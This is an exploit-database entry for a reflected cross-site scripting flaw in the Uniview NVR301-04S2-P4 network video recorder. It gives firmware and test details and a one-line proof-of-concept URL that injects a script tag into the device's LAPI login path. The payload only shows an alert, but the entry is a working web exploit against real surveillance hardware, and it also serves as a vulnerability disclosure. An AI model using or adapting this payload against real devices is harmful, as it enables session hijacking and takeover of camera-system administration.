Exploit for Uniview NVR301-04S2-P4 Cross Site Scripting

Name: Exploit for Uniview NVR301-04S2-P4 Cross Site Scripting
Rating: 5 (163 reviews)

2023-03-30 | CVSS 6.8

## https://sploitus.com/exploit?id=PACKETSTORM:171583
# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)  
# Author: Bleron Rrustemi  
# Discovery Date: 2022-11-15  
# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/  
# Datasheet:: https://www.uniview.com/download.do?id=1761643  
# Device Firmware: NVR-B3801.20.15.200829  
# Tested Version: NVR301-04S2-P4  
# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)  
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)  
# CVE: N/A  
  
  
  
  
  
# Proof of Concept:  
  
IP=IP of the device  
  
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>